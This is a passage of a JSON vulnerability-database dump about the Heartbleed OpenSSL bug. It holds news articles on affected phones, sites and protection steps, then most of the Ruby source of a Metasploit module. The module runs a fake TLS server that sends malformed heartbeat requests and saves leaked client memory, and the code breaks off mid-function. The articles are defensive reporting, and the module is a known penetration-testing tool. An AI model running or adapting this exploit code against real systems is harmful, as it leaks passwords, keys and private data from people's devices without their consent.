one can imagine how many Smartphones and tablets were at risk.\n\n \n\n\nWell, Google has released the patches for Android 4.1.1 which is being distributed among the Android partners.\n\n \n\n\n**APPLE**\n\n[Apple](<https://thehackernews.com/search/label/Apple>) users can be relaxed knowing that their devices running iOS and OS X are not affected by the most critical security flaw, Heartbleed.\n\n \n\n\n\"_Apple takes security very seriously. IOS and OS X never incorporated the vulnerable software and key web-based services were not affected_,\" Apple told [Re/code](<http://recode.net/2014/04/10/apple-says-ios-osx-and-key-web-services-not-affected-by-heartbleed-security-flaw/>).\n\n \n\n\nInstead using OpenSSL, Apple relies on different SSL/TLS libraries called Secure Transport, which was hit by its own very serious bug in February outcropping the possibility for [man-in-the-middle (MitM) attacks](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>) \u2014 though it wasn't as dangerous as the recent OpenSSL Heartbleed security Flaw.\n\n \n\n\nBut still Apple users were not exempted completely, as the users using BBM for private messages on iOS might have been vulnerable to this flaw.\n\n \n\n\n**BLACKBERRY**\n\nBlackberry [confirmed](<http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB35882&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl>) that some of its products, including Secure Work Space for iOS and Android, and BlackBerry Link for Windows and Mac OS and even BBM for iOS and Android were vulnerable to the Heartbleed security flaw. The figure of affected users is not least, as about 80 million people use BBM service.\n\n \n\n\nThey have also assured that BlackBerry Smartphones and tablets, BlackBerry Enterprise Server 5, BlackBerry Enterprise Service 10, and the BlackBerry Infrastructure are not affected by the flaw and are fully protected.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "reporter": "Swati Khandelwal", "published": "2014-04-13T08:19:00", "type": "thn", "title": "Billions of Smartphone Users affected by Heartbleed Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2014-04-13T19:32:50", "id": "THN:4868B616BCBA555DA2446F6F0EA837B0", "href": "https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://4.bp.blogspot.com/-iF_r9MR_7MM/U0boktQvR9I/AAAAAAAAbI4/p8kgxWrFu4c/s1600/protect-from-Heartbleed-bug.jpg>)\n\nMillions of websites, users' passwords, credit card numbers and other personal information may be at risk as a result of the [**Heartbleed security flaw**](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), a vulnerability in widely used cryptographic library '**_OpenSSL_**'. [[READ DETAILS HERE](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)] \n \nNetcraft [survey](<http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html>) says that about half a million widely trusted active websites on the internet are vulnerable to the heartbleed bug, which means the information transmitting through hundreds of thousands of websites could be vulnerable, despite the protection offered by encryption techniques.\n\n \n\n\nAccording to Netcraft, \u201c_the heartbeat extension was enabled on 17.5% of SSL sites, accounting for around half a million certificates issued by trusted certificate authorities. These certificates are consequently vulnerable to being spoofed (through private key disclosure), allowing an attacker to impersonate the affected websites without raising any browser warnings._\u201d\n\n \n\n\nAmong the trusted names running OpenSSL is Yahoo!, which has been affected by this critical flaw. Yes, Yahoo Inc., which boasts more than 800 million users worldwide, is among the Internet services that could be potentially hurt by Heartbleed.\n\n \n\n\nThe bug leaks the below given information, although Yahoo! has since patched its systems.\n\n[](<https://1.bp.blogspot.com/-C1vFJyYZ5Ig/U0bIgPoTloI/AAAAAAAAbIo/EjLY1KOHb9w/s728/yahoo-password-cracking.png>)\n\nThe Popular sites which exhibit support for the TLS heartbeat extension also include Twitter, Facebook, GitHub, Bank of America, DropBox are not currently vulnerable, but it is unclear that they were vulnerable few days ago.\n\n \n\n\nIncluding Yahoo!, Flickr, Tumbler, Google, OKCupid and even the anonymous search engine DuckDuckGo was vulnerable, which has now been fixed.\n\n \n\n\nYahoo Inc. said that it has \"s_uccessfully made appropriate corrections_\" to the main Yahoo properties, including Yahoo Homepage, Search, Mail, Finance, Sports, Food, Tech, Flickr and Tumblr.\n\n \n\n\nYou can see the Heartbleed mass-test when performed around 8th April from [here](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>). In the list, the websites shown vulnerable may not be vulnerable right now.\n\n \n**HOW TO CHECK IF YOUR FAVORITE WEBSITES ARE VULNERABLE**\n\n1.) First of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>), and if you're given a red flag, avoid the site for now. \n \n2.) LastPass also created a [Web app](<https://lastpass.com/heartbleed/>) that will tell you what kind of encryption a site uses, and when the encryption was last updated. \n \n3.) Provensec also created a scanner at <http://provensec.com/heartbleed/> \n \n4.) GlobalSign SSL Configuration [Checker](<https://sslcheck.globalsign.com/>). \n \n5.) The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n\n \n\n\n**HOW TO PROTECT YOURSELF FROM HEARTBLEED** \nIf the site you use is not affected by the vulnerability, its good idea that you change your password immediately, assuming that it was vulnerable before, just to make sure that you are now safe. But changing the password before the bug is fixed could compromise your new password as well. \n \nYou are advised to don't reuse the same passwords on different websites and try to use a separate password for each website. \n \nIf you are using a public Wi-Fi at MacDonald or any other public places, then you should limit your Internet behavior and avoid sign in into websites that are especially sensitive. \n \nOpenSSL version 1.0.1 through 1.0.1f and 1.0.2-beta1 are Vulnerable and flaw is fixed in [OpenSSL 1.0.1g](<https://www.openssl.org/source/>). If you haven't yet, please update your system that use OpenSSL for TLS encrypted communications.\n\n \n\n\nAnd last but not the least; keep an eye on every financial transaction, and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Secure! Stay Tuned. \n \n**Related Important Articles:** \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "reporter": "Swati Khandelwal", "published": "2014-04-10T07:58:00", "type": "thn", "title": "How to Protect yourself from the 'Heartbleed' Bug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2014-04-12T09:00:15", "id": "THN:3E9A13AAEA7FDC38D7BD8A148F19663D", "href": "https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:17:11", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "references": [], "description": "[](<https://4.bp.blogspot.com/-svp9PF6wRBU/U0zgP6p7T4I/AAAAAAAAbOU/05vHzW4cmI4/s1600/heartbleed.png>)\n\n_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), The Heartbleed bug is a vulnerability resided in TLS heartbeat mechanism built into certain versions of the popular open source encryption standard OpenSSL, a popular version of the Transport Layer Security (TLS) protocol.\n\n \n\n\n**2.) HOW IT WORKS?**\n\nFor SSL to work, your computer needs to communicate to the server via sending '_**heartbeats**_' that keep informing the server that client (computer) is online (alive).\n\n \n\n\nHeartbleed attack allows an attacker to retrieve a block of memory of the server up to 64kb in response directly from the vulnerable server via sending the malicious heartbeat and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\n \n\n\nIt opens doors for the cyber criminals to extract sensitive data directly from the server's memory without leaving any traces.\n\n[](<https://2.bp.blogspot.com/-0_DevhynabI/U0zUQQ-yUXI/AAAAAAAAbN8/UurRUbKnZbc/s1600/heartbleed_explanation.png>) \n--- \n_xkcd comic http://xkcd.com/1354/_ \n**3.) HEARTBLEED ATTACK RELIES ON MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to deal with a Man-in-the-Middle (MitM) attack. But using Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could set up a fake website that passes the security verification.\n\n \n\n\nAn attacker could also decrypt the traffic passing between a client and a server i.e. Perfect man-in-the-middle attack on HTTPS connection.\n\n \n\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so it can be used to attack clients as well as servers. An Attacker can obtain up to 64K memory from the server or client as well that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\n \n\n\nResearcher [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) two-thirds of the world's servers i.e. half a million servers are affected by the Heartbleed Bug, including websites, email, and instant messaging services.\n\n \n**Video Explanation:** \n\n\n**5.) HOW HEARTBLEED AFFECTS SMARTPHONES?**\n\nSmartphone is the best practical example of Client side attacks.\n\n \n\n\nAll versions of Android OS include outdated versions of OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to Heartbleed bug, whereas Apple's iOS devices are not affected by OpenSSL flaw.\n\n \n\n\nGoogle had patched the affected version Android 4.1.1, but it will take long time to deliver updated Android version to the end Smartphone users as updates to majority handsets are controlled by phone manufacturers and wireless carriers. Until users running the affected versions are vulnerable to the attacks, and hackers will definitely take advantage of this public disclosure.\n\n \n\n\n**6.) WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, Routers, Medical devices, Smart TV sets, embedded devices and millions of other devices that rely on the OpenSSL to provide secure communications could also be vulnerable to Heartbleed bug, as it is not expected for these devices to get the updates soon from Google\u2019s Android partners.\n\n \n\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) the critical infrastructure organizations (like energy, utilities or financial services companies) to beef-up their systems in order to defend against the Heartbleed attacks.\n\n \n\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe actually can't blame anyone developer, specially who are contributing to Open Source projects without money motivations. \n\n \n\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n \n\n\n\"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) '_I did so unintentionally_'.\n\n \n\n\n**8.) WHO HAS EXPLOITED THIS BUG YET?**\n\nBloomberg accused the National Security Agency (NSA) of knowing the Heartbleed bug for the last two years. Not even this, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. But if it is so, then this would be one of the biggest developments in the history of wiretapping ever. However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it saying NSA was not aware of Heartbleed until it was made public.\n\n \n\n\nBut when it comes to exploit any known vulnerability, then Hackers are most likely to be top on the list. As the flaw was so widely spread that it affected half a million websites worldwide, so after the public disclosure, the cybercriminals could reach the sites to steal credentials, passwords and other data, before the site operators apply the freely available patch.\n\n \n\n\nThere are multiple Proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CHANGING ACCOUNT PASSWORDS CAN SOLVE THE ISSUE?**\n\nNot exactly, as Heartbleed attack has the ability to leak anything from the server including your passwords, credit card details or any kind of personal information. But, in order to protect your online accounts you should at least change your passwords immediately for the sites that resolved the issue and for the sites not affected by the bug as well, just to make sure that you are safe.\n\n \n\n\nFirst of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using following services or apps:, and if you're given a red flag, avoid the site for now.\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n * To check whether your Android devices are safe or not, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL and the scanner also checks the version of the library and whether heartbeat is enabled or not.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy as it leaves no traces behind and here the matter goes worse.\n\n \n\n\nYou may never know if you have been hacked using the flaw or not. This means that there is no way to tell if your information was stolen previously from a site or a service that has now fixed it.\n\n \n\n\nBut if you haven't change the password to the popular sites yet, then yes, your password and financial information are still widely open to cybercriminals and other spying agencies.\n\n \n\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all DON'T PANIC. You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw then your every effort is useless, as it\u2019s up to the site to first fix the vulnerability as soon as possible , because changing the password before the bug is fixed could compromise your new password as well. \n \nIf you own a vulnerable SSL Service, then you are recommended to: \n\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Safe! \n\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "reporter": "Mohit Kumar", "published": "2014-04-14T20:40:00", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2014-04-17T10:28:24", "id": "THN:244769C413FFA5BE647D8F6F93431B74", "href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2019-01-14T09:57:13", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher.", "reporter": "Rapid7", "published": "2014-04-09T14:38:11", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/openssl_heartbeat_client_memory.rb", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-08-27T18:11:22", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n if level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = 